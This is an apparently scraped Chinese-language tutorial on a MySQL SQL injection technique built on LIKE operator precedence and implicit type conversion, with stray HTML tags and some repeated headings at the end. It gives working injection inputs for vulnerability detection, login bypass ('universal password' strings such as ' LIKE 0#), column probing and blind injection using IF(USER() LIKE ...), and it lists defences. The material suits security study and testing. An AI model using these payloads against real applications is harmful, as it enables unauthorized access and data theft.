SQL注入新技巧：基于LIKE语句的注入方法详解<\/h1>

0x01 前言<\/h2>
本文介绍了一种基于MySQL LIKE语句的新型SQL注入技术，该技术可以用于SQL注入检测、盲注以及构造"万能密码"等场景。这种技术利用了MySQL中LIKE运算符的优先级和类型转换特性。<\/p>

0x02 技术原理<\/h2>

0x02.1 运算符优先级<\/h3>

在MySQL中，LIKE运算符的优先级高于=运算符，因此以下两条SQL语句是等价的：<\/p>

SELECT<\/span> *<\/span> FROM<\/span> admin<\/span> WHERE<\/span> name=<\/span>1<\/span> LIKE<\/span> 2<\/span>;
<\/span><\/span>SELECT<\/span> *<\/span> FROM<\/span> admin<\/span> WHERE<\/span> name=<\/span>(1<\/span> LIKE<\/span> 2<\/span>);
<\/span><\/span><\/code><\/pre>0x02.2 类型差异影响<\/h3>
整型字段情况<\/h4>
当字段类型为整型(int)时：<\/p>

当表达式为True时(1 LIKE 1)，效果等同于id=1<\/code><\/li>
当表达式为False时(1 LIKE 2)，效果等同于id=0<\/code><\/li>
<\/ul>
示例：<\/p>
SELECT<\/span> *<\/span> FROM<\/span> users WHERE<\/span> id=<\/span>1<\/span> LIKE<\/span> 1<\/span>;  -- 返回id=1的记录
<\/span><\/span><\/span><\/span>SELECT<\/span> *<\/span> FROM<\/span> users WHERE<\/span> id=<\/span>1<\/span> LIKE<\/span> 2<\/span>;  -- 返回空结果(因为id=0通常不存在)
<\/span><\/span><\/span><\/code><\/pre>字符串字段情况<\/h4>
当字段类型为字符串时：<\/p>

当表达式为True时，效果等同于or 1=0<\/code><\/li>
当表达式为False时，效果等同于or 1=1<\/code><\/li>
<\/ul>
示例：<\/p>
SELECT<\/span> *<\/span> FROM<\/span> users WHERE<\/span> username=<\/span>1<\/span> LIKE<\/span> 2<\/span>;  -- 相当于username=False or 1=1
<\/span><\/span><\/span><\/code><\/pre>0x03 其他应用技巧<\/h2>
列名存在性检测<\/h3>
SELECT<\/span> *<\/span> FROM<\/span> users WHERE<\/span> username=<\/span>column_name<\/span> LIKE<\/span> 1<\/span>;
<\/span><\/span><\/code><\/pre>
如果column_name存在，返回正常结果<\/li>
如果column_name不存在，会报错<\/li>
<\/ul>
排除特定项<\/h3>
SELECT<\/span> *<\/span> FROM<\/span> users WHERE<\/span> username=<\/span>1<\/span> LIKE<\/span> (id!=<\/span>1<\/span>);
<\/span><\/span><\/code><\/pre>可以用于排除特定ID的记录<\/p>
0x04 实际应用场景<\/h2>
0x04.1 SQL注入检测<\/h3>
在整型参数中检测：<\/p>
?id=1' LIKE 1#   -- 正常返回
?id=1' LIKE 0#   -- 返回空
<\/code><\/pre>
在字符串参数中检测：<\/p>
?username=admin' LIKE 1#   -- 返回空
?username=admin' LIKE 0#   -- 返回所有记录
<\/code><\/pre>
0x04.2 构造万能密码<\/h3>
利用字符串字段的特性构造登录绕过：<\/p>
username=<\/span>' LIKE 0#   -- 任何密码都可登录
<\/span><\/span><\/span>password=anything
<\/span><\/span><\/span><\/code><\/pre>或者：<\/p>
username=<\/span>'+False#    -- 同样效果
<\/span><\/span><\/span>password=anything
<\/span><\/span><\/span><\/code><\/pre>0x04.3 盲注利用<\/h3>
可以结合IF函数进行盲注：<\/p>
1<\/span> LIKE<\/span> (IF<\/span>(USER<\/span>() LIKE<\/span> 'a%'<\/span>,1<\/span>,2<\/span>))
<\/span><\/span><\/code><\/pre>通过观察返回结果判断条件是否为真<\/p>
0x05 技术细节与注意事项<\/h2>


隐式类型转换<\/strong>：MySQL在进行比较时会自动进行类型转换，字符串与数字比较时会将字符串转为浮点数<\/p>
<\/li>

局限性<\/strong>：<\/p>

字符串字段中使用时，类似or 1=1<\/code>但不会匹配所有内容(如"1aaa"这样的内容不会被匹配)<\/li>
整型字段中使用时，只能检测是否存在特定ID的记录<\/li>
<\/ul>
<\/li>

防御措施<\/strong>：<\/p>

使用参数化查询<\/li>
对用户输入进行严格过滤<\/li>
避免动态拼接SQL语句<\/li>
<\/ul>
<\/li>
<\/ol>
0x06 总结<\/h2>
这种基于LIKE语句的SQL注入技术虽然不算全新，但提供了一些有趣的攻击向量，特别是在：<\/p>

快速检测SQL注入漏洞<\/li>
构造登录绕过("万能密码")<\/li>
进行盲注攻击<\/li>
<\/ul>
安全开发人员应当了解这种技术以更好地防御相关攻击。对于渗透测试人员，这提供了又一种检测和利用SQL注入的方法。<\/p>

SQL注入新技巧：基于LIKE语句的注入方法详解<\/h1>

0x01 前言<\/h2> 本文介绍了一种基于MySQL LIKE语句的新型SQL注入技术，该技术可以用于SQL注入检测、盲注以及构造"万能密码"等场景。这种技术利用了MySQL中LIKE运算符的优先级和类型转换特性。<\/p>

0x02 技术原理<\/h2>

0x02.2 类型差异影响<\/h3>

0x03 其他应用技巧<\/h2>

0x04 实际应用场景<\/h2>

0x01 前言<\/h2>
本文介绍了一种基于MySQL LIKE语句的新型SQL注入技术，该技术可以用于SQL注入检测、盲注以及构造"万能密码"等场景。这种技术利用了MySQL中LIKE运算符的优先级和类型转换特性。<\/p>